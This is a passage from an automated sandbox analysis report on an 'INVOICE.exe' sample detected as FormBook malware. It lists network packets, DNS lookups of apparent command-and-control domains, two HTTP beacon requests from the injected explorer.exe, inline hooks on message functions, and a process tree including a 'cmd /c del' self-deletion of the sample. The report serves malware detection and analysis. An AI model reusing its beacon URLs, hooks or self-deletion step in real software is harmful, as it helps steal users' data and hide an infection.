                                                                                    Jun 11, 2021 11:38:41.553481102 CEST4974780192.168.2.3104.21.29.70
                                                                                    Jun 11, 2021 11:38:41.595850945 CEST8049747104.21.29.70192.168.2.3
                                                                                    Jun 11, 2021 11:38:41.595957041 CEST4974780192.168.2.3104.21.29.70
                                                                                    Jun 11, 2021 11:38:41.596096992 CEST4974780192.168.2.3104.21.29.70
                                                                                    Jun 11, 2021 11:38:41.638364077 CEST8049747104.21.29.70192.168.2.3
                                                                                    Jun 11, 2021 11:38:42.096560001 CEST4974780192.168.2.3104.21.29.70
                                                                                    Jun 11, 2021 11:38:42.141098976 CEST8049747104.21.29.70192.168.2.3
                                                                                    Jun 11, 2021 11:38:42.143011093 CEST4974780192.168.2.3104.21.29.70
                                                                                    Jun 11, 2021 11:39:00.816756964 CEST4975080192.168.2.334.102.136.180
                                                                                    Jun 11, 2021 11:39:00.860651016 CEST804975034.102.136.180192.168.2.3
                                                                                    Jun 11, 2021 11:39:00.860801935 CEST4975080192.168.2.334.102.136.180
                                                                                    Jun 11, 2021 11:39:00.861119986 CEST4975080192.168.2.334.102.136.180
                                                                                    Jun 11, 2021 11:39:00.903263092 CEST804975034.102.136.180192.168.2.3
                                                                                    Jun 11, 2021 11:39:01.004425049 CEST804975034.102.136.180192.168.2.3
                                                                                    Jun 11, 2021 11:39:01.004502058 CEST804975034.102.136.180192.168.2.3
                                                                                    Jun 11, 2021 11:39:01.004724026 CEST4975080192.168.2.334.102.136.180
                                                                                    Jun 11, 2021 11:39:01.004793882 CEST4975080192.168.2.334.102.136.180
                                                                                    Jun 11, 2021 11:39:01.046962023 CEST804975034.102.136.180192.168.2.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jun 11, 2021 11:36:58.467942953 CEST5754453192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:36:58.518048048 CEST53575448.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:36:59.447951078 CEST5598453192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:36:59.497910976 CEST53559848.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:00.374031067 CEST6418553192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:00.424078941 CEST53641858.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:01.205167055 CEST6511053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:01.260135889 CEST53651108.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:02.118025064 CEST5836153192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:02.169770002 CEST53583618.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:03.452197075 CEST6349253192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:03.507711887 CEST53634928.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:04.508501053 CEST6083153192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:04.573848963 CEST53608318.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:06.010664940 CEST6010053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:06.065388918 CEST53601008.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:06.892235041 CEST5319553192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:06.942306995 CEST53531958.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:07.770050049 CEST5014153192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:07.823528051 CEST53501418.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:09.380112886 CEST5302353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:09.433016062 CEST53530238.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:10.276912928 CEST4956353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:10.327306032 CEST53495638.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:11.057784081 CEST5135253192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:11.107798100 CEST53513528.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:12.032434940 CEST5934953192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:12.082403898 CEST53593498.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:12.853564024 CEST5708453192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:12.903722048 CEST53570848.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:13.670710087 CEST5882353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:13.721008062 CEST53588238.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:14.982156038 CEST5756853192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:15.035181046 CEST53575688.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:30.540622950 CEST5054053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:30.609957933 CEST53505408.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:36.929832935 CEST5436653192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:36.992439032 CEST53543668.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:37:53.923386097 CEST5303453192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:37:53.986794949 CEST53530348.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:17.375897884 CEST5776253192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:17.520206928 CEST53577628.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:18.109930992 CEST5543553192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:18.168560982 CEST53554358.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:18.626332998 CEST5071353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:18.689140081 CEST53507138.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:18.856791019 CEST5613253192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:18.916877985 CEST53561328.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:19.445235014 CEST5898753192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:19.562400103 CEST5657953192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:19.637095928 CEST53565798.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:19.733454943 CEST53589878.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:20.300620079 CEST6063353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:20.360088110 CEST53606338.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:20.994693041 CEST6129253192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:21.053555965 CEST53612928.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:21.667176962 CEST6361953192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:21.730510950 CEST53636198.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:22.316395998 CEST6493853192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:22.377222061 CEST53649388.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:22.517118931 CEST6194653192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:22.567471981 CEST53619468.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:23.346878052 CEST6491053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:23.408225060 CEST53649108.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:23.875382900 CEST5212353192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:23.937048912 CEST53521238.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:41.481421947 CEST5613053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:41.552371025 CEST53561308.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:42.869371891 CEST5633853192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:42.945235968 CEST53563388.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:38:44.144849062 CEST5942053192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:38:44.212188959 CEST53594208.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:39:00.753635883 CEST5878453192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:39:00.815494061 CEST53587848.8.8.8192.168.2.3
                                                                                    Jun 11, 2021 11:39:23.180476904 CEST6397853192.168.2.38.8.8.8
                                                                                    Jun 11, 2021 11:39:23.242651939 CEST53639788.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Jun 11, 2021 11:38:18.626332998 CEST192.168.2.38.8.8.80x8b6Standard query (0)www.dollysusmitha.comA (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:38:41.481421947 CEST192.168.2.38.8.8.80xce40Standard query (0)www.cpf3life.comA (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:39:00.753635883 CEST192.168.2.38.8.8.80xf502Standard query (0)www.phonetomouth.comA (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:39:23.180476904 CEST192.168.2.38.8.8.80xaefaStandard query (0)www.gicc-fx.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Jun 11, 2021 11:38:18.689140081 CEST8.8.8.8192.168.2.30x8b6No error (0)www.dollysusmitha.comwww.dollysusmitha.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                    Jun 11, 2021 11:38:41.552371025 CEST8.8.8.8192.168.2.30xce40No error (0)www.cpf3life.com104.21.29.70A (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:38:41.552371025 CEST8.8.8.8192.168.2.30xce40No error (0)www.cpf3life.com172.67.148.145A (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:39:00.815494061 CEST8.8.8.8192.168.2.30xf502No error (0)www.phonetomouth.comphonetomouth.comCNAME (Canonical name)IN (0x0001)
                                                                                    Jun 11, 2021 11:39:00.815494061 CEST8.8.8.8192.168.2.30xf502No error (0)phonetomouth.com34.102.136.180A (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 11:39:23.242651939 CEST8.8.8.8192.168.2.30xaefaNo error (0)www.gicc-fx.com198.252.100.204A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.cpf3life.com
                                                                                    • www.phonetomouth.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349747104.21.29.7080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jun 11, 2021 11:38:41.596096992 CEST5863OUTGET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz HTTP/1.1
                                                                                    Host: www.cpf3life.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.34975034.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jun 11, 2021 11:39:00.861119986 CEST5905OUTGET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI HTTP/1.1
                                                                                    Host: www.phonetomouth.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jun 11, 2021 11:39:01.004425049 CEST5905INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Fri, 11 Jun 2021 09:39:00 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60c03ab8-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Code Manipulations

                                                                                    User Modules

                                                                                    Hook Summary

                                                                                    Function NameHook TypeActive in Processes
                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                    GetMessageWINLINEexplorer.exe
                                                                                    GetMessageAINLINEexplorer.exe

                                                                                    Processes

                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                    Function NameHook TypeNew Data
                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3
                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Analysis Process: INVOICE.exe PID: 6440 Parent PID: 5804

                                                                                    General

                                                                                    Start time:11:37:03
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\INVOICE.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\INVOICE.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:246224 bytes
                                                                                    MD5 hash:98901AFF995D92677CF637B241AE9A9B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    Analysis Process: INVOICE.exe PID: 6476 Parent PID: 6440

                                                                                    General

                                                                                    Start time:11:37:04
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\INVOICE.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\INVOICE.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:246224 bytes
                                                                                    MD5 hash:98901AFF995D92677CF637B241AE9A9B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 6476

                                                                                    General

                                                                                    Start time:11:37:08
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff714890000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: systray.exe PID: 2148 Parent PID: 6476

                                                                                    General

                                                                                    Start time:11:37:39
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\systray.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                    Imagebase:0xc50000
                                                                                    File size:9728 bytes
                                                                                    MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    Analysis Process: cmd.exe PID: 2100 Parent PID: 2148

                                                                                    General

                                                                                    Start time:11:37:41
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\Desktop\INVOICE.exe'
                                                                                    Imagebase:0x10b0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: conhost.exe PID: 4968 Parent PID: 2100

                                                                                    General

                                                                                    Start time:11:37:42
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >